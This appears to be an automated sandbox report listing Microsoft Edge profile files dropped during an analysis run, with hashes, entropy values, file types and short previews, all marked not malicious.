                                                                                                                                                                            SHA-512:FC1A3F2EDCB58E565E392A5488F2A099708540578F70566B9DAD33A920914D311D99D189F6F45F39C45C07B4C25AF16BCC46D4209F51162D18871DEA13A29806
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.363 13d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/11-03:39:38.364 13d8 Recovering log #3.2024/12/11-03:39:38.364 13d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                            Entropy (8bit):5.201117771657053
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Oo9+q2P923oH+TcwtpIFUt8ORWrNJZmw+ORWrN9VkwO923oH+Tcwta/WLJ:7OXv4YebmFUt8OwrX/+OwrF5LYebaUJ
                                                                                                                                                                            MD5:9A1F68782675BDA0DB1E8B6D9A426F54
                                                                                                                                                                            SHA1:FE113A5DB042A06925FB80C14F5E5263219AB22C
                                                                                                                                                                            SHA-256:0D96C61542839154CBD8638387309712B6E21BC6D1371637FA945B286654CD0A
                                                                                                                                                                            SHA-512:FC1A3F2EDCB58E565E392A5488F2A099708540578F70566B9DAD33A920914D311D99D189F6F45F39C45C07B4C25AF16BCC46D4209F51162D18871DEA13A29806
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.363 13d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/11-03:39:38.364 13d8 Recovering log #3.2024/12/11-03:39:38.364 13d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1220878973775341
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:KdM2qOB1nxCkTSAELyKOMq+8yC8F/YfU5m+OlT:Kvq+n0I9ELyKOMq+8y9/Ow
                                                                                                                                                                            MD5:609B497EE21C071513ED99128FD7BBA5
                                                                                                                                                                            SHA1:A6C6FCD5CF1EC5D9584335BE994ABADC2FA6705D
                                                                                                                                                                            SHA-256:8B1566190776285A27BFA5342B1BD0CF0DD4C0B80FD6DF30892A5519E20AA647
                                                                                                                                                                            SHA-512:C0EBE69DC37944F482A736DB622432DBC3C37464B85AE5881AB61570E81381E6C0A1210BA0EB0D2D2482145BF5FD479C47FA21DDC6CC4E88753438FD43326846
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11755
                                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28367
                                                                                                                                                                            Entropy (8bit):5.558246678265002
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7b37pLGLPLSWPMOf1d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwSbpttuP:MhD7bxcPLSWPMOf1du1jaCrnLSntk
                                                                                                                                                                            MD5:349C7119A0FB6776BE3828093ABC26BD
                                                                                                                                                                            SHA1:CFCD0001073582A2C80E5D0CC2DAC7200D79AD2B
                                                                                                                                                                            SHA-256:334FB01CC6D061F198BDF21276686158DD078C7923C4DEC53ECFD036C5830018
                                                                                                                                                                            SHA-512:C8B83377FD59FC47D1DC7EE579D641F359C280920AC982C0B68C94361B3D0E6082EAE6E6005E77959E0D6A242E22C56073FC3687C1F0A9C17A6AAF6F93FB89A7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.04936279064293761
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:Gd0JAmu8jH0JAmu8jL9XCChslotGLNl0ml/XoQDeX:zJXsJXxpEjVl/XoQ
                                                                                                                                                                            MD5:5D0C04F0027C10D96C0F276FD4A780EE
                                                                                                                                                                            SHA1:A62A3492B8C288E37F84959DBA4F0DCC4558DE90
                                                                                                                                                                            SHA-256:0A027CAECA735B56DE709403BD4EFDAAFFC1DB195F2E32E885FC373C19DC0772
                                                                                                                                                                            SHA-512:52749897993A5AFE9012208ACCCFD30F02E343C9AB33F8C4E49417AA01C66939D0F19A328921C644892C67C7494C05DD7568C43AC526826044F69606B5DB9529
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..-.....................:Db.W.v..4..}..tT...l...-.....................:Db.W.v..4..}..tT...l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2020
                                                                                                                                                                            Entropy (8bit):5.32166849590672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:iDG8xSBSeQdPQHRHWxkIYjIYGzmqkDMYjMY+qylAlkfAlkr3Ei:ak0eQKIYjIYGzmbDMYjMYyYcY+3Ei
                                                                                                                                                                            MD5:090A8CF78F6419220D8FCC9A2973F6B6
                                                                                                                                                                            SHA1:58D8F200CFD847ECF3E5AA577DF5862012393AF7
                                                                                                                                                                            SHA-256:4A06B6E504C7B134893C11C711789C78CBACDF17E4567340950A41E110638F19
                                                                                                                                                                            SHA-512:45AD881B2ECCA1E22D2C33FA95946AA119209289A7EFBE15EA06F2B08E4CAA49897DB698B5225BBE3D6BDBE96B58F3D0C54E2A0FDB3C21F270CAA739BBA1C742
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=....................................4_IPH_CompanionSidePanel...IPH_CompanionSidePanel....$4_IPH_CompanionSidePanelRegionSearch(."IPH_CompanionSidePanelRegionSearch.....4_IPH_DownloadToolbarButton...IPH_DownloadToolbarButton....&4_IPH_FocusHelpBubbleScreenReaderPromo*.$IPH_FocusHelpBubbleScreenReaderPromo.....4_IPH_GMCCastStartStop...IPH_GMCCastStartStop.....4_IPH_HighEfficiencyMode...IPH_HighEfficiencyMode.....4_IPH_LiveCaption...IPH_LiveCaption.....4_IPH_PasswordsAccountStorage!..IPH_Pa
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.244469287252946
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7qi3+q2P923oH+TcwtfrK+IFUt8OqY5Zmw+Oqt9VkwO923oH+TcwtfrUeLJ:7qPv4Yeb23FUt8OqY5/+Oql5LYeb3J
                                                                                                                                                                            MD5:190417A3CB0839D5944B37FCF11F7D2F
                                                                                                                                                                            SHA1:E47B10A6DBFD66C1F8B6B88C673B2D803FC9600F
                                                                                                                                                                            SHA-256:8F842D2C4D7B77D6186FA60C9BC11E236EB12500BE8FB63C86AFEE831A3A9AB4
                                                                                                                                                                            SHA-512:31317C669285136B916D98876E8A24E3E9FA91760F7E2F79D90A781C353011DA9AF485A01533F8D2CC5D52B7F03B667E434646B176B19BA44CE31CB58C7D7F66
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.463 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/11-03:39:39.465 938 Recovering log #3.2024/12/11-03:39:39.466 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.244469287252946
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7qi3+q2P923oH+TcwtfrK+IFUt8OqY5Zmw+Oqt9VkwO923oH+TcwtfrUeLJ:7qPv4Yeb23FUt8OqY5/+Oql5LYeb3J
                                                                                                                                                                            MD5:190417A3CB0839D5944B37FCF11F7D2F
                                                                                                                                                                            SHA1:E47B10A6DBFD66C1F8B6B88C673B2D803FC9600F
                                                                                                                                                                            SHA-256:8F842D2C4D7B77D6186FA60C9BC11E236EB12500BE8FB63C86AFEE831A3A9AB4
                                                                                                                                                                            SHA-512:31317C669285136B916D98876E8A24E3E9FA91760F7E2F79D90A781C353011DA9AF485A01533F8D2CC5D52B7F03B667E434646B176B19BA44CE31CB58C7D7F66
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.463 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/11-03:39:39.465 938 Recovering log #3.2024/12/11-03:39:39.466 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                            Entropy (8bit):4.089449943493988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:G0nYUtypD3RUovhC+lvBOL+t3IvB8f12/6:LYUtyp1vxdBllIp8f0i
                                                                                                                                                                            MD5:A4FF1AD5DDD86E2FFEC54C60EA640FF0
                                                                                                                                                                            SHA1:89C5183277541E50B3760CB1CF96E51D8763C619
                                                                                                                                                                            SHA-256:6566C59DB938C176645FC47EE7A229FE0A679DA8185265FDAFC176DC69F6CD64
                                                                                                                                                                            SHA-512:7018BDEE309E9AA38094F25DA4DD0063AE3C61B6CBF85BCDCA837F0B255DAF88560A76535B91F4FBC6799AF91C2D041E8F6F777D6B65B77E3CB230DE1051E0A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ....P.................3_......C...................4_.......:S.................3_.....!sN..................4_.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):339
                                                                                                                                                                            Entropy (8bit):5.185567300183782
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7ue+q2P923oH+TcwtfrzAdIFUt8OujXJZmw+OujX9VkwO923oH+TcwtfrzILJ:7uPv4Yeb9FUt8Ou9/+OuP5LYeb2J
                                                                                                                                                                            MD5:FF29063BE197BBFD9C80AF0C960E649E
                                                                                                                                                                            SHA1:0A5969740B4BAF84860AB982F8FE4BB8A310D00D
                                                                                                                                                                            SHA-256:014396CD91BBF8A76FDB4835E3E54E3BE366A63E26CB69883A70A83688DDFE32
                                                                                                                                                                            SHA-512:EAFF6EB26586E15EE713A1D3F54C412ABE662596CD67CD04F551C365BA9BBB6F36D580E7E054BCC13DCE8821E130E8F3F1C757CE6A3D2F0557CC80C4BD9D95AC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.423 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/11-03:39:39.424 938 Recovering log #3.2024/12/11-03:39:39.424 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):339
                                                                                                                                                                            Entropy (8bit):5.185567300183782
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7ue+q2P923oH+TcwtfrzAdIFUt8OujXJZmw+OujX9VkwO923oH+TcwtfrzILJ:7uPv4Yeb9FUt8Ou9/+OuP5LYeb2J
                                                                                                                                                                            MD5:FF29063BE197BBFD9C80AF0C960E649E
                                                                                                                                                                            SHA1:0A5969740B4BAF84860AB982F8FE4BB8A310D00D
                                                                                                                                                                            SHA-256:014396CD91BBF8A76FDB4835E3E54E3BE366A63E26CB69883A70A83688DDFE32
                                                                                                                                                                            SHA-512:EAFF6EB26586E15EE713A1D3F54C412ABE662596CD67CD04F551C365BA9BBB6F36D580E7E054BCC13DCE8821E130E8F3F1C757CE6A3D2F0557CC80C4BD9D95AC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.423 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/11-03:39:39.424 938 Recovering log #3.2024/12/11-03:39:39.424 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):398313
                                                                                                                                                                            Entropy (8bit):4.953803318132309
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:veqeoyyQJztYNr3CZsTKsvbbOPlMa0JJoG3JfeX5B7FxRG0MZ/d18bfpyvFaRnxY:q7JVZb0JOGiMldObbFG/eFd2X134a
                                                                                                                                                                            MD5:4529A95302CDD7EF2BB39E087A5E8DF6
                                                                                                                                                                            SHA1:6449A1AAEF5A5BBF798FF0FFF1BB51F5150FD578
                                                                                                                                                                            SHA-256:A41F5D82CF139CB1C29E91EE45A873B98879971E5E5552CC3B903EB8FE1CF658
                                                                                                                                                                            SHA-512:B314C5434D903E0472C7A1E02E958DE7DC68C7FE44CAC3486B98C48BB057E6263EC6EF00A1CCC186FC6CD3240EC2D62C73D091975B669ACE7D978AB65A670318
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",. "9anime.gs"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.7192945256669794
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                            MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                            SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                            SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                            SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:117.0.2045.47
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
